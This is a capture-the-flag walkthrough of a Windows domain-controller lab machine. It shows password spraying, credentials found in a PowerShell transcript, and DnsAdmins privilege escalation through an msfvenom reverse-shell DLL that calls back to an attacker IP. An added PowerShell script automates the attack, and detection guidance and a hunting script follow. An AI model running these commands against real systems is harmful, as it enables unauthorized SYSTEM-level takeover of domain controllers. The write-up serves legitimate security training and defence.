Summary
- Running enum4linux gave a list of usernames.
- Found a password for the user marko in the enum4linux output, but it turned out to be melanie's.
- Logged in as melanie using evil-winrm
- Got user.txt flag
- Manual enumeration of directories (hidden items included) turned up some hidden files
- Got password for user ryan from a file.
- Switched to ryan
- ryan is a member of the DnsAdmins group
- Crafted a malicious DLL to be loaded by the DNS service as its ServerLevelPluginDll
- Started an SMB server with impacket's smbserver.py
- Pointed /serverlevelplugindll at my DLL with dnscmd
- Stopped and started the DNS service
- Got root.txt
nmap scan results
SMB was enumerated first using enum4linux. The following users were found and saved to a file named user.txt to use as a username list.
Going through the enum4linux results, I also found a password in an account description:
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
Using crackmapexec, the password was sprayed over SMB against the collected users (one password tried against every user, rather than a brute force, which keeps the attempts-per-account count at one and avoids lockouts):
crackmapexec smb 10.10.10.169 -u user.txt -p Welcome123!
It turned out the password was valid not for marko but for melanie: melanie:Welcome123!
Using smbmap, the shares were listed, but nothing interesting was found.
Remote access with evil-winrm was tried using these creds and was successful.
Moving into melanie's Desktop, user.txt was found.
Privilege Escalation
Listing the users on the system showed quite a number of accounts.
Manually enumerating the directories with hidden items included, an interesting directory was discovered.
Digging further into the directory, a PowerShell transcript file was found: PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Inside the transcript, ryan's credentials were found (a password typed on the command line is recorded verbatim by PowerShell transcription):
credentials--> ryan:Serv3r4Admin4cc123!
I used these creds to log in remotely with evil-winrm, and it was successful.
whoami /all was run and, interestingly, ryan was a member of DnsAdmins. Other ways to check a user's group membership are
(Get-ADUser userName -Properties MemberOf).MemberOf or net user userName /domain
After some googling, a blog was found that explained how members of DnsAdmins can escalate privileges here
Therefore a DLL payload was created with msfvenom using the command below:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4443 --platform=windows -f dll > privesc.dll
The file was then hosted over SMB. SMB was chosen because Windows supports UNC paths natively, so the DNS service can load the DLL straight from the share, and because writing the payload to the victim's disk risks having Defender or another AV delete it.
The SMB server was created with impacket's smbserver.py as follows:
sudo smbserver.py SHARE .
A test confirmed that the victim machine could access the share.
Next, the command below was run in PowerShell to register the DLL as the DNS server's plugin DLL (dnscmd writes the path to the ServerLevelPluginDll registry value; the DLL is only loaded by dns.exe, which runs as Local System, when the service next starts):
dnscmd.exe /config /serverlevelplugindll \\10.10.14.4\SHARE\privesc.dll
Then finally, the DNS service was stopped and started again so that dns.exe loads the DLL.
And we got a SYSTEM shell (the DNS service runs as Local System), i.e. full administrative access.
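As an added example (not code from the original write-up), here are the target-side steps above collected into one PowerShell script for the evil-winrm session as ryan, with the checks I would want before and after each step. It assumes the same attacker IP, share name and DLL name as the write-up and that the reverse-shell listener on 4443 is already running; the use of sc.exe for the stop/start and of reg delete for the cleanup are my choices, not something the write-up shows.

```powershell
# Added example: DnsAdmins -> ServerLevelPluginDll, run on the target as ryan.
# Assumed values (from the write-up): attacker 10.10.14.4, share SHARE, privesc.dll.
$AttackerHost = '10.10.14.4'
$DllPath      = "\\$AttackerHost\SHARE\privesc.dll"
$ParamsKey    = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

# 1. Confirm we are actually in DnsAdmins before touching anything.
$groups = (whoami /groups) -join "`n"
if ($groups -notmatch 'DnsAdmins') {
    throw 'Current user is not a member of DnsAdmins; this path will not work.'
}

# 2. Confirm the share is reachable from the target. dns.exe runs as Local System
#    and will reach the share as the machine account, so the share has to allow
#    unauthenticated access (impacket's smbserver.py does by default).
if (-not (Test-Path -Path $DllPath)) {
    throw "Cannot reach $DllPath - check smbserver.py and any firewall in between."
}

# 3. Register the DLL. dnscmd stores the path in ServerLevelPluginDll under
#    $ParamsKey; nothing is loaded until the service restarts.
dnscmd.exe /config /serverlevelplugindll $DllPath
$set = (Get-ItemProperty -Path $ParamsKey -Name ServerLevelPluginDll -ErrorAction Stop).ServerLevelPluginDll
if ($set -ne $DllPath) { throw "Registry value not set as expected, got: $set" }

# 4. Stop and start the service (assumption: sc.exe, which works for ryan on this box).
#    On start, dns.exe loads privesc.dll and the reverse shell calls back to
#    10.10.14.4:4443 as NT AUTHORITY\SYSTEM.
sc.exe stop dns | Out-Null
Start-Sleep -Seconds 3
sc.exe start dns | Out-Null

# 5. Cleanup once the SYSTEM shell is in hand, otherwise the DNS service keeps
#    reloading the payload (and failing) on every restart. Assumption: reg delete
#    is the simplest way to clear the value.
#    reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll /f
#    sc.exe stop dns ; sc.exe start dns
```

The membership check up front matters because dnscmd will happily fail with an access-denied error on a non-member, and the registry read-back after step 3 is the cheapest way to know the /config call actually took before you restart a production service.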
Root.txt
For the blue teamers, there are some ways to detect or prevent the DnsAdmins privilege escalation:
- To prevent the attack, audit the ACL for write access to the DNS server object and review the membership of the DnsAdmins group.
- Indicators are a DNS service restart together with a couple of log entries:
- DNS Server log Event ID 150 (plugin DLL failed to load) and Event ID 770 (plugin DLL loaded successfully)
- Monitoring changes to the registry value HKLM:\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll will also help.
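As an added example (not part of the original write-up), the three checks above as a PowerShell script to run on the DNS server / DC as an administrator. It assumes the RSAT ActiveDirectory module is available for the group lookup; the registry-ACL check is my addition, and note that dnscmd writes the value through the DNS RPC interface, so DnsAdmins membership, not the key's ACL, is the control that actually gates the attack.

```powershell
# Added example: hunt for the DnsAdmins plugin-DLL technique on a DNS server.
# Assumption: run elevated on the DNS server with the ActiveDirectory module present.
$ParamsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Test-DnsPluginDll {
    # Any configured ServerLevelPluginDll is unusual; a UNC path or a path outside
    # System32 is what the attack above leaves behind.
    $value = (Get-ItemProperty -Path $ParamsKey -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    if ([string]::IsNullOrEmpty($value)) {
        return [pscustomobject]@{ Configured = $false; Path = $null; Suspicious = $false; Reason = 'no plugin DLL configured' }
    }
    $reason = 'plugin DLL configured; confirm it is expected'
    if ($value -like '\\*') {
        $reason = 'plugin DLL loaded from a UNC path'
    } elseif ($value -notlike "$env:SystemRoot\System32\*") {
        $reason = 'plugin DLL outside System32'
    }
    [pscustomobject]@{ Configured = $true; Path = $value; Suspicious = $true; Reason = $reason }
}

function Get-DnsPluginEvents {
    param([int]$Hours = 24)
    # Event 150 = plugin DLL failed to load, 770 = plugin DLL loaded (IDs from the write-up).
    Get-WinEvent -FilterHashtable @{
        LogName   = 'DNS Server'
        Id        = 150, 770
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

function Get-DnsParametersWriters {
    # Who can set values directly under the Parameters key (bypassing dnscmd entirely).
    (Get-Acl -Path $ParamsKey).Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $_.RegistryRights -match 'SetValue|WriteKey|FullControl' } |
        Select-Object IdentityReference, RegistryRights, IsInherited
}

# Anyone in this list can do exactly what ryan did; nested membership included.
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive | Select-Object Name, SamAccountName, objectClass

Test-DnsPluginDll
Get-DnsPluginEvents -Hours 168
Get-DnsParametersWriters
```

For continuous monitoring rather than a one-off hunt, a Sysmon registry rule (Event ID 13, RegistryEvent value set) on that TargetObject turns the "monitor the registry value" bullet into an alert, and a service stop/start of DNS shortly after a 150 or 770 event is the sequence to correlate on.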
I Hope you found this helpful.